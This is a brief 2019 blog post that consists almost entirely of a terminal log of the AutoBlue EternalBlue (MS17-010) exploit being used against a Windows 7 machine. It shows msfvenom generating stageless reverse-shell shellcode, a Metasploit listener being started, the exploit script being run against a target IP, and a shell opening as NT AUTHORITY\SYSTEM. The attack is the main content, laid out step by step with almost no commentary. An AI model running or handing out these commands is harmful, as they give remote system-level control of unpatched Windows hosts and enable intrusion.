Friday, August 16, 2019

autoblue is better than msfconsole sometimes

 root@kali# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git        
 Cloning into 'AutoBlue-MS17-010'...                         
 remote: Enumerating objects: 1, done.                                     
 remote: Counting objects: 100% (1/1), done.                        
 remote: Total 72 (delta 0), reused 0 (delta 0), pack-reused 71  
 Unpacking objects: 100% (72/72), done.  
   
 root@kali# ./shell_prep.sh           
          _.-;;-._                            
      '-..-'|  ||  |                            
      '-..-'|_.-;;-._|                            
      '-..-'|  ||  |                              
      '-..-'|_.-''-._|                            
 Eternal Blue Windows Shellcode Compiler                     
                                          
 Let's compile them windoos shellcodezzz                     
                                          
 Compiling x64 kernel shellcode                                     
 Compiling x86 kernel shellcode                            
 kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)  
 Y                             
 LHOST for reverse connection:                       
 10.254.1.47                          
 LPORT you want x64 to listen on:                
 443  
 LPORT you want x86 to listen on:  
 445  
 Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell  
 1                          
 Type 0 to generate a staged payload or 1 to generate a stageless payload  
 1                      
 Generating x64 cmd shell (stageless)...    
   
 msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=443  
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
 [-] No arch selected, selecting arch: x64 from the payload  
 No encoder or badchars specified, outputting raw payload  
 Payload size: 460 bytes  
 Saved as: sc_x64_msf.bin  
   
 Generating x86 cmd shell (stageless)...  
   
 msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.254.1.47 LPORT=445  
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload  
 [-] No arch selected, selecting arch: x86 from the payload  
 No encoder or badchars specified, outputting raw payload  
 Payload size: 324 bytes  
 Saved as: sc_x86_msf.bin  
   
 MERGING SHELLCODE WOOOO!!!  
 DONE  
   
 root@kali# ./listener_prep.sh  
  __  
  /,-  
  ||)  
  \\_, )  
   `--'  
 Enternal Blue Metasploit Listener  
   
 LHOST for reverse connection:  
 10.254.1.47  
 LPORT for x64 reverse connection:  
 443  
 LPORT for x86 reverse connection:  
 445  
 Enter 0 for meterpreter shell or 1 for regular cmd shell:  
 1  
 Type 0 if this is a staged payload or 1 if it is for a stageless payload  
 1  
 Starting listener (stageless)...  
 [ ok ] Starting postgresql (via systemctl): postgresql.service.  
   
   
 MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM  
 MMMMMMMMMMM        MMMMMMMMMM  
 MMMN$              vMMMM  
 MMMNl MMMMM       MMMMM JMMMM  
 MMMNl MMMMMMMN    NMMMMMMM JMMMM  
 MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM  
 MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM  
 MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM  
 MMMNI MMMMM  MMMMMMM  MMMMM jMMMM  
 MMMNI MMMMM  MMMMMMM  MMMMM jMMMM  
 MMMNI MMMNM  MMMMMMM  MMMMM jMMMM  
 MMMNI WMMMM  MMMMMMM  MMMM# JMMMM  
 MMMMR ?MMNM       MMMMM .dMMMM  
 MMMMNm `?MMM       MMMM` dMMMMM  
 MMMMMMN ?MM       MM? NMMMMMN  
 MMMMMMMMNe         JMMMMMNMMM  
 MMMMMMMMMMNm,      eMMMMMNMMNMM  
 MMMMNNMNMMMMMNx    MMMMMMNMMNMMNM  
 MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM  
     https://metasploit.com  
   
   
     =[ metasploit v5.0.6-dev              ]  
 + -- --=[ 1857 exploits - 1055 auxiliary - 327 post    ]  
 + -- --=[ 546 payloads - 44 encoders - 10 nops      ]  
 + -- --=[ 2 evasion                    ]  
   
 [*] Processing config.rc for ERB directives.  
 resource (config.rc)> use exploit/multi/handler  
 resource (config.rc)> set PAYLOAD windows/x64/shell_reverse_tcp  
 PAYLOAD => windows/x64/shell_reverse_tcp  
 resource (config.rc)> set LHOST 10.254.1.47  
 LHOST => 10.254.1.47  
 resource (config.rc)> set LPORT 443  
 LPORT => 443  
 resource (config.rc)> set ExitOnSession false  
 ExitOnSession => false  
 resource (config.rc)> set EXITFUNC thread  
 EXITFUNC => thread  
 resource (config.rc)> exploit -j  
 [*] Exploit running as background job 0.  
 [*] Exploit completed, but no session was created.  
 resource (config.rc)> set PAYLOAD windows/shell/reverse_tcp  
 [*] Started reverse TCP handler on 10.254.1.47:443  
 PAYLOAD => windows/shell/reverse_tcp  
 resource (config.rc)> set LPORT 445  
 LPORT => 445  
 resource (config.rc)> exploit -j  
 [*] Exploit running as background job 1.  
 [*] Exploit completed, but no session was created.  
 [*] Starting persistent handler(s)...  
   
 [*] Started reverse TCP handler on 10.254.1.47:445  
 msf5 exploit(multi/handler) >   
   
 root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin  
 shellcode size: 2203  
 numGroomConn: 13  
 Target OS: Windows 7 Professional 7601 Service Pack 1  
 SMB1 session setup allocate nonpaged pool success  
 SMB1 session setup allocate nonpaged pool success  
 good response status: INVALID_PARAMETER  
 done  
 root@kali# python eternalblue_exploit7.py 10.1.1.13 shellcode/sc_all.bin  
 shellcode size: 2203  
 numGroomConn: 13  
 Target OS: Windows 7 Professional 7601 Service Pack 1  
 SMB1 session setup allocate nonpaged pool success  
 SMB1 session setup allocate nonpaged pool success  
 good response status: INVALID_PARAMETER  
 done  
   
 [*] Encoded stage with x86/shikata_ga_nai  
 [*] Sending encoded stage (267 bytes) to 10.1.1.13  
 [*] Command shell session 1 opened (10.254.1.47:445 -> 10.1.1.13:49173) at 2019-02-21 13:28:21 -0500  
   
 msf5 exploit(multi/handler) > sessions  
   
 Active sessions  
 ===============  
   
  Id Name Type        Information                                    Connection  
  -- ---- ----        -----------                                    ----------  
  1     shell x86/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.254.1.47:445 -> 10.1.1.13:49173 (10.1.1.13)  
   
 msf5 exploit(multi/handler) > sessions -i 1  
 [*] Starting interaction with 1...  
   
 More?  
 SR<@p  f%_?Mg??:6Zdx8}}(ks-cx_JwD`c@MWH?l hp6  
 The system cannot find the file specified.  
   
 C:\Windows\system32>whoami  
 whoami  
 nt authority\system  